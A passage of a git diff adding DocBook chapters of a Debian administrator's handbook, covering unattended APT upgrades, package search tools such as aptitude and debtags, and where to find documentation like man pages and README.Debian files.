+			Administrators in charge of several computers will no doubt appreciate being informed of pending upgrades, but the upgrades themselves are still as tedious as they used to be. Periodic upgrades can be enabled: it uses a <command>systemd</command> timer unit or <command>cron</command>. If <emphasis role="pkg">systemd</emphasis> is not installed the <filename>/etc/cron.daily/apt-compat</filename> script (in the <emphasis role="pkg">apt</emphasis> package) comes in handy. This script is run daily (and non-interactively) by <command>cron</command>. To control the behavior, use APT configuration variables (which are therefore stored in a file <filename>/etc/apt/apt.conf.d/10periodic</filename>). The main variables are:
+		</para>
+		 <variablelist>
+			<varlistentry>
+				<term> <literal>APT::Periodic::Update-Package-Lists</literal> </term>
+				 <listitem>
+					<para>
+						This option allows you to specify the frequency (in days) at which the package lists are refreshed. <command>apticron</command> users can do without this variable, since <command>apticron</command> already does this task.
+					</para>
+
+				</listitem>
+
+			</varlistentry>
+			 <varlistentry>
+				<term> <literal>APT::Periodic::Download-Upgradeable-Packages</literal> </term>
+				 <listitem>
+					<para>
+						Again, this option indicates a frequency (in days), this time for the downloading of the actual packages. Again, <command>apticron</command> users won't need it.
+					</para>
+
+				</listitem>
+
+			</varlistentry>
+			 <varlistentry>
+				<term> <literal>APT::Periodic::AutocleanInterval</literal> </term>
+				 <listitem>
+					<para>
+						This option covers a feature that <command>apticron</command> doesn't have. It controls how often obsolete packages (those not referenced by any distribution anymore) are removed from the APT cache. This keeps the APT cache at a reasonable size and means that you don't need to worry about that task.
+					</para>
+
+				</listitem>
+
+			</varlistentry>
+			 <varlistentry>
+				<term> <literal>APT::Periodic::Unattended-Upgrade</literal> </term>
+				 <listitem>
+					<indexterm><primary><emphasis role="pkg">unattended-upgrades</emphasis></primary></indexterm> <para>
+						When this option is enabled, the daily script will execute <command>unattended-upgrade</command> (from the <emphasis role="pkg">unattended-upgrades</emphasis> package) which — as its name suggest — can automatize the upgrade process for some packages (by default it only takes care of security updates, but this can be customized in <filename>/etc/apt/apt.conf.d/50unattended-upgrades</filename>). Note that this option can be set with the help of debconf by running <command>dpkg-reconfigure -plow unattended-upgrades</command>.
+					</para>
+
+				</listitem>
+
+			</varlistentry>
+
+		</variablelist>
+		 <para>
+			Other options can allow you to control the cache cleaning behavior with more precision. They are not listed here, but they are described in the <filename>/usr/lib/apt/apt.systemd.daily</filename> script.
+		</para>
+		 <indexterm>
+			<primary><emphasis role="pkg">gnome-packagekit</emphasis></primary>
+		</indexterm>
+		 <para>
+			These tools work very well for servers, but desktop users generally prefer a more interactive system. The package <emphasis role="pkg">gnome-packagekit</emphasis> provides an icon in the notification area of desktop environments when updates are available; clicking on this icon then runs <command>gpk-update-viewer</command>, a simplified interface to perform updates. You can browse through available updates, read the short description of the relevant packages and the corresponding <filename>changelog</filename> entries, and select whether to apply the update or not on a case-by-case basis.
+		</para>
+		 <figure>
+			<title>Upgrading with <command>gpk-update-viewer</command></title>
+			 <mediaobject>
+				<imageobject>
+					<imagedata fileref="images/gnome-packagekit.png" format="PNG" scalefit="1" width="70%" />
+				</imageobject>
+
+			</mediaobject>
+
+		</figure>
+		 <para>
+			This tool is no longer installed in the default GNOME desktop. The new philosophy is that security updates should be automatically installed, either in the background or, preferably, when you shutdown your computer so as to not confuse any running application.
+		</para>
+
+	</section>
+	 <section id="sect.automatic-upgrades">
+		<title>Automatic Upgrades</title>
+		 <indexterm>
+			<primary>upgrade</primary>
+			<secondary>automatic system upgrade</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>automatic upgrade</primary>
+		</indexterm>
+		 <para>
+			Since Falcot Corp has many computers but only limited manpower, its administrators try to make upgrades as automatic as possible. The programs in charge of these processes must therefore run with no human intervention.
+		</para>
+		 <section>
+			<title>Configuring <command>dpkg</command></title>
+			 <para>
+				As we have already mentioned (see sidebar <xref linkend="sidebar.questions-conffiles" />), <command>dpkg</command> can be instructed not to ask for confirmation when replacing a configuration file (with the <literal>--force-confdef --force-confold</literal> options). Interactions can, however, have three other sources: some come from APT itself, some are handled by <command>debconf</command>, and some happen on the command line due to package configuration scripts.
+			</para>
+
+		</section>
+		 <section>
+			<title>Configuring APT</title>
+			 <para>
+				The case of APT is simple: the <literal>-y</literal> option (or <literal>--assume-yes</literal>) tells APT to consider the answer to all its questions to be “yes”.
+			</para>
+
+		</section>
+		 <section>
+			<title>Configuring <command>debconf</command></title>
+			 <para>
+				The case of <command>debconf</command> deserves more details. This program was, from its inception, designed to control the relevance and volume of questions displayed to the user, as well as the way they are shown. That is why its configuration requests a minimal priority for questions; only questions above the minimal priority are displayed. <command>debconf</command> assumes the default answer (defined by the package maintainer) for questions which it decided to skip.
+			</para>
+			 <para>
+				The other relevant configuration element is the interface used by the front-end. If you choose <literal>noninteractive</literal> out of the choices, all user interaction is disabled. If a package tries to display an informative note, it will be sent to the administrator by email.
+			</para>
+			 <para>
+				To reconfigure <command>debconf</command>, use the <command>dpkg-reconfigure</command> tool from the <emphasis role="pkg">debconf</emphasis> package; the relevant command is <command>dpkg-reconfigure debconf</command>. Note that the configured values can be temporarily overridden with environment variables when needed (for instance, <varname>DEBIAN_FRONTEND</varname> controls the interface, as documented in the <citerefentry><refentrytitle>debconf</refentrytitle>
+				<manvolnum>7</manvolnum></citerefentry> manual page).
+			</para>
+
+		</section>
+		 <section>
+			<title>Handling Command Line Interactions</title>
+			 <para>
+				The last source of interactions, and the hardest to get rid of, is the configuration scripts run by <command>dpkg</command>. There is unfortunately no standard solution, and no answer is overwhelmingly better than another.
+			</para>
+			 <para>
+				The common approach is to suppress the standard input by redirecting the empty content of <filename>/dev/null</filename> into it with <command><replaceable>command</replaceable> &lt;/dev/null</command>, or to feed it with an endless stream of newlines. None of these methods is 100 % reliable, but they generally lead to the default answers being used, since most scripts consider a lack of reply as an acceptance of the default value.
+			</para>
+
+		</section>
+		 <section>
+			<title>The Miracle Combination</title>
+			 <para>
+				By combining the previous elements, it is possible to design a small but rather reliable script which can handle automatic upgrades.
+			</para>
+			 <example id="example.non-interactive-upgrade">
+				<title>Non-interactive upgrade script</title>
+				 
+<programlisting>export DEBIAN_FRONTEND=noninteractive
+yes '' | apt-get -y -o DPkg::options::="--force-confdef" -o DPkg::options::="--force-confold" dist-upgrade
+</programlisting>
+
+			</example>
+			 <sidebar> <title><emphasis>IN PRACTICE</emphasis> The Falcot Corp case</title>
+			 <para>
+				Falcot computers are a heterogeneous system, with machines having various functions. Administrators will therefore pick the most relevant solution for each computer.
+			</para>
+			 <para>
+				In practice, the servers running <emphasis role="distribution">Stretch</emphasis> are configured with the “miracle combination” above, and are kept up to date automatically. Only the most critical servers (the firewalls, for instances) are set up with <command>apticron</command>, so that upgrades always happen under the supervision of an administrator.
+			</para>
+			 <para>
+				The office workstations in the administrative services also run <emphasis role="distribution">Stretch</emphasis>, but they are equipped with <emphasis role="pkg">gnome-packagekit</emphasis>, so that users trigger the upgrades themselves. The rationale for this decision is that if upgrades happen without an explicit action, the behavior of the computer might change unexpectedly, which could cause confusion for the main users.
+			</para>
+			 <para>
+				In the lab, the few computers using <emphasis role="distribution">Testing</emphasis> — to take advantage of the latest software versions — are not upgraded automatically either. Administrators only configure APT to prepare the upgrades but not enact them; when they decide to upgrade (manually), the tedious parts of refreshing package lists and downloading packages will be avoided, and administrators can focus on the really useful part.
+			</para>
+			 </sidebar>
+		</section>
+
+	</section>
+	 <section id="sect.searching-packages">
+		<title>Searching for Packages</title>
+		 <para>
+			With the large and ever-growing amount of software in Debian, there emerges a paradox: Debian usually has a tool for most tasks, but that tool can be very difficult to find amongst the myriad other packages. The lack of appropriate ways to search for (and to find) the right tool has long been a problem. Fortunately, this problem has almost entirely been solved.
+		</para>
+		 <para>
+			The most trivial search possible is looking up an exact package name. If <command>apt show <replaceable>package</replaceable></command> returns a result, then the package exists. Unfortunately, this requires knowing or even guessing the package name, which isn't always possible.
+		</para>
+		 <sidebar> <title><emphasis>TIP</emphasis> Package naming conventions</title>
+		 <para>
+			Some categories of packages are named according to a conventional naming scheme; knowing the scheme can sometimes allow you to guess exact package names. For instance, for Perl modules, the convention says that a module called <literal>XML::Handler::Composer</literal> upstream should be packaged as <emphasis role="pkg">libxml-handler-composer-perl</emphasis>. The library enabling the use of the <command>gconf</command> system from Python is packaged as <emphasis role="pkg">python-gconf</emphasis>. It is unfortunately not possible to define a fully general naming scheme for all packages, even though package maintainers usually try to follow the choice of the upstream developers.
+		</para>
+		 </sidebar> <para>
+			A slightly more successful searching pattern is a plain-text search in package names, but it remains very limited. You can generally find results by searching package descriptions: since each package has a more or less detailed description in addition to its package name, a keyword search in these descriptions will often be useful. <command>apt-cache</command> and <command>axi-cache</command> are the tools of choice for this kind of search; for instance, <command>apt-cache search video</command> will return a list of all packages whose name or description contains the keyword “video”.
+		</para>
+		 <para>
+			For more complex searches, a more powerful tool such as <command>aptitude</command> is required. <command>aptitude</command> allows you to search according to a logical expression based on the package's meta-data fields. For instance, the following command searches for packages whose name contains <literal>kino</literal>, whose description contains <literal>video</literal> and whose maintainer's name contains <literal>paul</literal>:
+		</para>
+		 
+<screen>$ <userinput>aptitude search kino~dvideo~mpaul</userinput>
+p   kino  - Non-linear editor for Digital Video data
+$ <userinput>aptitude show kino</userinput>
+Package: kino
+Version: 1.3.4-2.2+b2
+State: not installed
+Priority: extra
+Section: video
+Maintainer: Paul Brossier &lt;piem@debian.org&gt;
+Architecture: amd64
+Uncompressed Size: 8300 k
+Depends: libasound2 (&gt;= 1.0.16), libatk1.0-0 (&gt;= 1.12.4), libavc1394-0
+         (&gt;= 0.5.3), libavcodec57 (&gt;= 7:3.2.4) | libavcodec-extra57 (&gt;=
+         7:3.2.4), libavformat57 (&gt;= 7:3.2.4), libavutil55 (&gt;= 7:3.2.4), libc6
+         (&gt;= 2.14), libcairo2 (&gt;= 1.2.4), libdv4 (&gt;= 1.0.0), libfontconfig1
+         (&gt;= 2.11), libfreetype6 (&gt;= 2.2.1), libgcc1 (&gt;= 1:3.0),
+         libgdk-pixbuf2.0-0 (&gt;= 2.22.0), libglade2-0 (&gt;= 1:2.6.4-2~), libglib2.0-0
+         (&gt;= 2.16.0), libgtk2.0-0 (&gt;= 2.24.0), libice6 (&gt;= 1:1.0.0),
+         libiec61883-0 (&gt;= 1.2.0), libpango-1.0-0 (&gt;= 1.14.0), libpangocairo-1.0-0
+         (&gt;= 1.14.0), libpangoft2-1.0-0 (&gt;= 1.14.0), libquicktime2 (&gt;=
+         2:1.2.2), libraw1394-11, libsamplerate0 (&gt;= 0.1.7), libsm6, libstdc++6
+         (&gt;= 5.2), libswscale4 (&gt;= 7:3.2.4), libx11-6, libxext6, libxml2 (&gt;=
+         2.7.4), libxv1, zlib1g (&gt;= 1:1.1.4)
+Recommends: ffmpeg, curl
+Suggests: udev | hotplug, vorbis-tools, sox, mjpegtools, lame, ffmpeg2theora
+Conflicts: kino-dvtitler, kino-timfx, kinoplus, kino-dvtitler:i386, kino-timfx:i386,
+           kinoplus:i386, kino:i386
+Replaces: kino-dvtitler, kino-timfx, kinoplus, kino-dvtitler:i386, kino-timfx:i386,
+          kinoplus:i386
+Provides: kino-dvtitler, kino-timfx, kinoplus
+Description: Non-linear editor for Digital Video data
+ Kino allows you to record, create, edit, and play movies recorded with DV camcorders.
+ This program uses many keyboard commands for fast navigating and editing inside the
+ movie.
+ 
+ The kino-timfx, kino-dvtitler and kinoplus sets of plugins, formerly distributed as
+ separate packages, are now provided with Kino.
+Homepage: http://www.kinodv.org/
+Tags: field::arts, hardware::camera, implemented-in::c, implemented-in::c++,
+      interface::graphical, interface::x11, role::program, scope::application,
+      suite::gnome, uitoolkit::gtk, use::editing, use::learning,
+      works-with::video, x11::application
+</screen>
+		 <para>
+			The search only returns one package, <emphasis role="pkg">kino</emphasis>, which satisfies all three criteria.
+		</para>
+		 <para>
+			Even these multi-criteria searches are rather unwieldy, which explains why they are not used as much as they could. A new tagging system has therefore been developed, and it provides a new approach to searching. Packages are given tags that provide a thematical classification along several strands, known as a “facet-based classification”. In the case of <emphasis role="pkg">kino</emphasis> above, the package's tags indicate that Kino is a Gnome-based software that works on video data and whose main purpose is editing.
+		</para>
+		 <para>
+			Browsing this classification can help you to search for a package which corresponds to known needs; even if it returns a (moderate) number of hits, the rest of the search can be done manually. To do that, you can use the <literal>~G</literal> search pattern in <command>aptitude</command>, but it is probably easier to simply navigate the site where tags are managed: <ulink type="block" url="https://debtags.debian.org/" />
+		</para>
+		 <indexterm>
+			<primary><emphasis role="pkg">debtags</emphasis></primary>
+		</indexterm>
+		 <indexterm>
+			<primary>tag</primary>
+		</indexterm>
+		 <para>
+			Selecting the <literal>works-with::video</literal> and <literal>use::editing</literal> tags yields a handful of packages, including the <emphasis role="pkg">kino</emphasis> and <emphasis role="pkg">pitivi</emphasis> video editors. This system of classification is bound to be used more and more as time goes on, and package managers will gradually provide efficient search interfaces based on it.
+		</para>
+		 <para>
+			To sum up, the best tool for the job depends on the complexity of the search that you wish to do:
+		</para>
+		 <itemizedlist>
+			<listitem>
+				<para>
+					<command>apt-cache</command> only allows searching in package names and descriptions, which is very convenient when looking for a particular package that matches a few target keywords;
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					when the search criteria also include relationships between packages or other meta-data such as the name of the maintainer, <command>synaptic</command> will be more useful;
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					when a tag-based search is needed, a good tool is <command>packagesearch</command>, a graphical interface dedicated to searching available packages along several criteria (including the names of the files that they contain). For usage on the command-line, <command>axi-cache</command> will fit the bill.
+				</para>
+				 <indexterm>
+					<primary><emphasis role="pkg">packagesearch</emphasis></primary>
+				</indexterm>
+				 <indexterm>
+					<primary><command>axi-cache</command></primary>
+				</indexterm>
+
+			</listitem>
+			 <listitem>
+				<para>
+					finally, when the searches involve complex expressions with logic operations, the tool of choice will be <command>aptitude</command>'s search pattern syntax, which is quite powerful despite being somewhat obscure; it works in both the command-line and the interactive modes.
+				</para>
+
+			</listitem>
+
+		</itemizedlist>
+
+	</section>
+</chapter>
+
diff --git a/tmp/cs-CZ/xml/07_solving-problems.xml b/tmp/cs-CZ/xml/07_solving-problems.xml
new file mode 100644
index 000000000..0fa49532a
--- /dev/null
+++ b/tmp/cs-CZ/xml/07_solving-problems.xml
@@ -0,0 +1,433 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="solving-problems" lang="cs-CZ">
+	<chapterinfo>
+		 <keywordset>
+			<keyword>Documentation</keyword>
+			 <keyword>Solving problems</keyword>
+			 <keyword>Log files</keyword>
+			 <keyword>README.Debian</keyword>
+			 <keyword>Manual</keyword>
+			 <keyword>info</keyword>
+
+		</keywordset>
+
+	</chapterinfo>
+	 <title>Solving Problems and Finding Relevant Information</title>
+	 <highlights> <para>
+		For an administrator, the most important skill is to be able to cope with any situation, known or unknown. This chapter gives a number of methods that will — hopefully — allow you to isolate the cause of any problem that you will encounter, so that you may be able to resolve them.
+	</para>
+	 </highlights> <section id="sect.documentation-sources">
+		<title>Documentation Sources</title>
+		 <indexterm>
+			<primary>documentation</primary>
+		</indexterm>
+		 <para>
+			Before you can understand what is really going on when there is a problem, you need to know the theoretical role played by each program involved in the problem. To do this, the best reflex to have is consult their documentation; but since these documentations are many and can be scattered far and wide, you should know all the places where they can be found.
+		</para>
+		 <section id="sect.manual-pages">
+			<title>Manual Pages</title>
+			 <indexterm>
+				<primary><command>man</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>apropos</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>manual pages</primary>
+			</indexterm>
+			 <sidebar> <title><emphasis>CULTURE</emphasis> <acronym>RTFM</acronym></title>
+			 <indexterm>
+				<primary><acronym>RTFM</acronym></primary>
+			</indexterm>
+			 <para>
+				This acronym stands for “Read the F***ing Manual”, but can also be expanded in a friendlier variant, “Read the Fine Manual”. This phrase is sometimes used in (terse) responses to questions from newbies. It is rather abrupt, and betrays a certain annoyance at a question asked by someone who has not even bothered to read the documentation. Some say that this classic response is better than no response at all (since it indicates that the documentation contains the information sought), or than a more verbose and angry answer.
+			</para>
+			 <para>
+				In any case, if someone responds “RTFM” to you, it is often wise not to take offense. Since this answer may be perceived as vexing, you might want to try and avoid receiving it. If the information that you need is not in the manual, which can happen, you might want to say so, preferably in your initial question. You should also describe the various steps that you have personally taken to find information before you raised a question on a forum. Following Eric Raymond's guidelines is a good way to avoid the most common mistakes and get useful answers. <ulink type="block" url="http://catb.org/~esr/faqs/smart-questions.html" />
+			</para>
+			 </sidebar> <para>
+				Manual pages, while relatively terse in style, contain a great deal of essential information. We will quickly go over the command for viewing them. Simply type <command>man <replaceable>manual-page</replaceable></command> — the manual page usually goes by the same name as the command whose documentation is sought. For example, to learn about the possible options for the <command>cp</command> command, you would type the <command>man cp</command> command at the shell prompt (see sidebar <xref linkend="sidebar.shell" />).
+			</para>
+			 <sidebar id="sidebar.shell"> <title><emphasis>BACK TO BASICS</emphasis> The shell, a command line interpreter</title>
+			 <indexterm>
+				<primary>command line interpreter</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>shell</primary>
+			</indexterm>
+			 <para>
+				A command line interpreter, also called a “shell”, is a program that executes commands that are either entered by the user or stored in a script. In interactive mode, it displays a prompt (usually ending in <literal>$</literal> for a normal user, or by <literal>#</literal> for an administrator) indicating that it is ready to read a new command. <xref linkend="short-remedial-course" /> describes the basics of using the shell.
+			</para>
+			 <para>
+				The default and most commonly used shell is <command>bash</command> (Bourne Again SHell), but there are others, including <command>dash</command>, <command>csh</command>, <command>tcsh</command> and <command>zsh</command>.
+			</para>
+			 <para>
+				Among other things, most shells offer help during input at the prompt, such as the completion of command or file names (which you can generally activate by pressing the <keycap>tab</keycap> key), or recalling previous commands (history management).
+			</para>
+			 </sidebar> <para>
+				Man pages not only document programs accessible from the command line, but also configuration files, system calls, C library functions, and so forth. Sometimes names can collide. For example, the shell's <command>read</command> command has the same name as the <function>read</function> system call. This is why manual pages are organized in numbered sections:
+			</para>
+			 <orderedlist>
+				<listitem>
+					<para>
+						commands that can be executed from the command line;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						system calls (functions provided by the kernel);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						library functions (provided by system libraries);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						devices (on Unix-like systems, these are special files, usually placed in the <filename>/dev/</filename> directory);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						configuration files (formats and conventions);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						games;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						sets of macros and standards;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						system administration commands;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						kernel routines.
+					</para>
+
+				</listitem>
+
+			</orderedlist>
+			 <para>
+				It is possible to specify the section of the manual page that you are looking for: to view the documentation for the <function>read</function> system call, you would type <command>man 2 read</command>. When no section is explicitly specified, the first section that has a manual page with the requested name will be shown. Thus, <command>man shadow</command> returns <citerefentry><refentrytitle>shadow</refentrytitle>
+				<manvolnum>5</manvolnum></citerefentry> because there are no manual pages for <foreignphrase>shadow</foreignphrase> in sections 1 to 4.
+			</para>
+			 <sidebar> <title><emphasis>TIP</emphasis> <command>whatis</command></title>
+			 <indexterm>
+				<primary><command>whatis</command></primary>
+			</indexterm>
+			 <para>
+				If you do not want to look at the full manual page, but only a short description to confirm that it is what you are looking for, simply enter <command>whatis <replaceable>command</replaceable></command>.
+			</para>
+			 
+<screen>
+<computeroutput>$ </computeroutput><userinput>whatis scp</userinput>
+<computeroutput>scp (1)     - secure copy (remote file copy program)</computeroutput></screen>
+			 <para>
+				This short description is included in the <emphasis>NAME</emphasis> section at the beginning of all manual pages.
+			</para>
+			 </sidebar> <para>
+				Of course, if you do not know the names of the commands, the manual is not going to be of much use to you. This is the purpose of the <command>apropos</command> command, which helps you conduct a search in the manual pages, or more specifically in their short descriptions. Each manual page begins essentially with a one line summary. <command>apropos</command> returns a list of manual pages whose summary mentions the requested keyword(s). If you choose them well, you will find the name of the command that you need.
+			</para>
+			 <example>
+				<title>Finding <command>cp</command> with <command>apropos</command></title>
+				 
+<screen>
+<computeroutput>$ </computeroutput><userinput>apropos "copy file"</userinput>
+<computeroutput>cp (1)               - copy files and directories
+cpio (1)             - copy files to and from archives
+gvfs-copy (1)        - Copy files
+gvfs-move (1)        - Copy files
+hcopy (1)            - copy files from or to an HFS volume
+install (1)          - copy files and set attributes
+ntfscp (8)           - copy file to an NTFS volume.
+</computeroutput></screen>
+
+			</example>
+			 <sidebar> <title><emphasis>TIP</emphasis> Browsing by following links</title>
+			 <para>
+				Many manual pages have a “SEE ALSO” section, usually at the end. It refers to other manual pages relevant to similar commands, or to external documentation. In this way, it is possible to find relevant documentation even when the first choice is not optimal.
+			</para>
+			 </sidebar> <para>
+				The <command>man</command> command is not the only means of consulting the manual pages, since <command>khelpcenter</command> and <command>konqueror</command> (by KDE) and <command>yelp</command> (under GNOME) programs also offer this possibility. There is also a web interface, provided by the <command>man2html</command> package, which allows you to view manual pages in a web browser. On a computer where this package is installed, use this URL: <ulink type="block" url="http://localhost/cgi-bin/man/man2html" />
+			</para>
+			 <para>
+				This utility requires a web server. This is why you should choose to install this package on one of your servers: all users of the local network could benefit from this service (including non-Linux machines), and this will allow you not to set up an HTTP server on each workstation. If your server is also accessible from other networks, it may be desirable to restrict access to this service only to users of the local network.
+			</para>
+			 <indexterm>
+				<primary><command>man2html</command></primary>
+			</indexterm>
+			 <para>
+				Last but not least, you can view all manual pages available in Debian (even those that are not installed on your machine) on the <literal>manpages.debian.org</literal> service. It offers each manual page in multiple versions, one for each Debian release. <ulink type="block" url="https://manpages.debian.org" />
+			</para>
+			 <sidebar> <title><emphasis>DEBIAN POLICY</emphasis> Required man pages</title>
+			 <para>
+				Debian requires each program to have a manual page. If the upstream author does not provide one, the Debian package maintainer will usually write a minimal page that will at the very least direct the reader to the location of the original documentation.
+			</para>
+			 </sidebar>
+		</section>
+		 <section>
+			<title><emphasis>info</emphasis> Documents</title>
+			 <indexterm>
+				<primary><emphasis>info</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>GNU</primary>
+				<secondary>Info</secondary>
+			</indexterm>
+			 <para>
+				The GNU project has written manuals for most of its programs in the <emphasis>info</emphasis> format; this is why many manual pages refer to the corresponding <emphasis>info</emphasis> documentation. This format offers some advantages, but the default program to view these documents (it is called <command>info</command>) is also slightly more complex. You would be well advised to use <command>pinfo</command> instead (from the <emphasis role="pkg">pinfo</emphasis> package).
+			</para>
+			 <indexterm>
+				<primary><command>pinfo</command></primary>
+			</indexterm>
+			 <para>
+				The <emphasis>info</emphasis> documentation has a hierarchical structure, and if you invoke <command>pinfo</command> without parameters, it will display a list of the nodes available at the first level. Usually, nodes bear the name of the corresponding commands.
+			</para>
+			 <para>
+				With <command>pinfo</command> navigating between these nodes is easy to achieve with the arrow keys. Alternatively, you could also use a graphical browser, which is a lot more user-friendly. Again, <command>konqueror</command> and <command>yelp</command> work; the <command>info2www</command> also provides a web interface. <ulink type="block" url="http://localhost/cgi-bin/info2www" />
+			</para>
+			 <indexterm>
+				<primary><command>info2www</command></primary>
+			</indexterm>
+			 <para>
+				Note that the <emphasis>info</emphasis> system is not suitable for translation, unlike the <command>man</command> page system. <emphasis>info</emphasis> documents are thus almost always in English. However, when you ask the <command>pinfo</command> program to display a non-existing <emphasis>info</emphasis> page, it will fall back on the <emphasis>man</emphasis> page by the same name (if it exists), which might be translated.
+			</para>
+
+		</section>
+		 <section>
+			<title>Specific Documentation</title>
+			 <indexterm>
+				<primary>documentation</primary>
+			</indexterm>
+			 <para>
+				Each package includes its own documentation. Even the least well documented programs generally have a <filename>README</filename> file containing some interesting and/or important information. This documentation is installed in the <filename>/usr/share/doc/<replaceable>package</replaceable>/</filename> directory (where <replaceable>package</replaceable> represents the name of the package). If the documentation is particularly large, it may not be included in the program's main package, but might be offloaded to a dedicated package which is usually named <literal><replaceable>package</replaceable>-doc</literal>. The main package generally recommends the documentation package so that you can easily find it.
+			</para>
+			 <indexterm>
+				<primary><filename>README.Debian</filename></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><filename>changelog.Debian.gz</filename></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><filename>NEWS.Debian.gz</filename></primary>
+			</indexterm>
+			 <para>
+				The <filename>/usr/share/doc/<replaceable>package</replaceable>/</filename> directory also contains some files provided by Debian which complete the documentation by specifying the package's particularities or improvements compared to a traditional installation of the software. The <filename>README.Debian</filename> file also indicates all of the adaptations that were made to comply with the Debian Policy. The <filename>changelog.Debian.gz</filename> file allows the user to follow the modifications made to the package over time: it is very useful to try to understand what has changed between two installed versions that do not have the same behavior. Finally, there is sometimes a <filename>NEWS.Debian.gz</filename> file which documents the major changes in the program that may directly concern the administrator.
+			</para>
+
+		</section>
+		 <section>
+			<title>Websites</title>
+			 <para>
+				In most cases, free software programs have websites that are used to distribute it and to bring together the community of its developers and users. These sites are frequently loaded with relevant information in various forms: official documentation, FAQ (Frequently Asked Questions), mailing list archives, etc. Problems that you may encounter have often already been the subject of many questions; the FAQ or mailing list archives may have a solution for it. A good mastery of search engines will prove immensely valuable to find relevant pages quickly (by restricting the search to the Internet domain or sub-domain dedicated to the program). If the search returns too many pages or if the results do not match what you seek, you can add the keyword <userinput>debian</userinput> to limit results and target relevant information.
+			</para>
+			 <sidebar> <title><emphasis>TIPS</emphasis> From error to solution</title>
+			 <para>
+				If the software returns a very specific error message, enter it into the search engine (between double quotes, <literal>"</literal>, in order to search not for individual keywords, but for the complete phrase). In most cases, the first links returned will contain the answer that you need.
+			</para>
+			 <para>
+				In other cases, you will get very general errors, such as “Permission denied”. In this case, it is best to check the permissions of the elements involved (files, user ID, groups, etc.).
+			</para>
+			 </sidebar> <para>
+				If you do not know the address for the software's website, there are various means of getting it. First, check if there is a <literal>Homepage</literal> field in the package's meta-information (<command>apt show <replaceable>package</replaceable></command>). Alternately, the package description may contain a link to the program's official website. If no URL is indicated, look at <filename>/usr/share/doc/<replaceable>package</replaceable>/copyright</filename>. The Debian maintainer generally indicates in this file where they got the program's source code, and this is likely to be the website that you need to find. If at this stage your search is still unfruitful, consult a free software directory, such as FSF's Free Software Directory, or search directly with a search engine, such as Google, DuckDuckGo, Yahoo, etc. <ulink type="block" url="https://directory.fsf.org/wiki/Main_Page" />
+			</para>
+			 <indexterm>
+				<primary><filename>copyright</filename></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Free Software Directory</primary>
+			</indexterm>
+			 <para>
+				You might also want to check the Debian wiki, a collaborative website where anybody, even simple visitors, can make suggestions directly from their browsers. It is used equally by developers who design and specify their projects, and by users who share their knowledge by writing documents collaboratively. <ulink type="block" url="http://wiki.debian.org/" />
+			</para>
+			 <indexterm>
+				<primary><emphasis>wiki.debian.org</emphasis></primary>
+			</indexterm>
+
+		</section>
+		 <section>
+			<title>Tutorials (<emphasis>HOWTO</emphasis>)</title>
+			 <indexterm>
+				<primary><emphasis>HOWTO</emphasis></primary>
+			</indexterm>
+			 <para>
+				A howto is a document that describes, in concrete terms and step by step, “how to” reach a predefined goal. The covered goals are relatively varied, but often technical in nature: for example, setting up IP Masquerading, configuring software RAID, installing a Samba server, etc. These documents often attempt to cover all of the potential problems likely to occur during the implementation of a given technology.
+			</para>
+			 <para>
+				Many such tutorials are managed by the Linux Documentation Project (LDP), whose website hosts all of these documents: <ulink type="block" url="http://www.tldp.org/" />
+			</para>
+			 <indexterm>
+				<primary>LDP</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Linux Documentation Project</primary>
+			</indexterm>
+			 <para>
+				These documents should be taken with a grain of salt. They are often several years old; the information they contain is sometimes obsolete. This phenomenon is even more frequent for their translations, since updates are neither systematic nor instant after the publication of a new version of the original documents. This is part of the joys of working in a volunteer environment and without constraints…
+			</para>
+
+		</section>
+
+	</section>
+	 <section id="sect.common-procedures">
+		<title>Common Procedures</title>
+		 <indexterm>
+			<primary>standard procedure</primary>
+		</indexterm>
+		 <para>
+			The purpose of this section is to present some general tips on certain operations that an administrator will frequently have to perform. These procedures will of course not cover every possible case in an exhaustive way, but they may serve as starting points for the more difficult cases.
+		</para>
+		 <sidebar> <title><emphasis>DISCOVERY</emphasis> Documentation in other languages</title>
+		 <para>
+			Often, documentation translated into a non-English language is available in a separate package with the name of the corresponding package, followed by <literal>-<replaceable>lang</replaceable></literal> (where <replaceable>lang</replaceable> is the two-letter ISO code for the language).
+		</para>
+		 <para>
+			For instance, the <emphasis>apt-howto-fr</emphasis> package contains the French translation of the howto for <emphasis>APT</emphasis>. Likewise, the <emphasis>quick-reference-fr</emphasis> and <emphasis>debian-reference-fr</emphasis> packages are the French versions of the reference guides for Debian (initially written in English by Osamu Aoki).
+		</para>
+		 </sidebar> <section>
+			<title>Configuring a Program</title>
+			 <indexterm>
+				<primary>configuration</primary>
+				<secondary>program configuration</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>program</primary>
+				<secondary>configuration</secondary>
+			</indexterm>
+			 <para>
+				When you want to configure an unknown package, you must proceed in stages. First, you should read what the package maintainer has documented. Reading <filename>/usr/share/doc/<replaceable>package</replaceable>/README.Debian</filename> will indeed allow you to learn of specific provisions made to simplify the use of the software. It is sometimes essential in order to understand the differences from the original behavior of the program, as described in the general documentation, such as howtos. Sometimes this file also details the most common errors in order for you to avoid wasting time on common problems.
+			</para>
+			 <para>
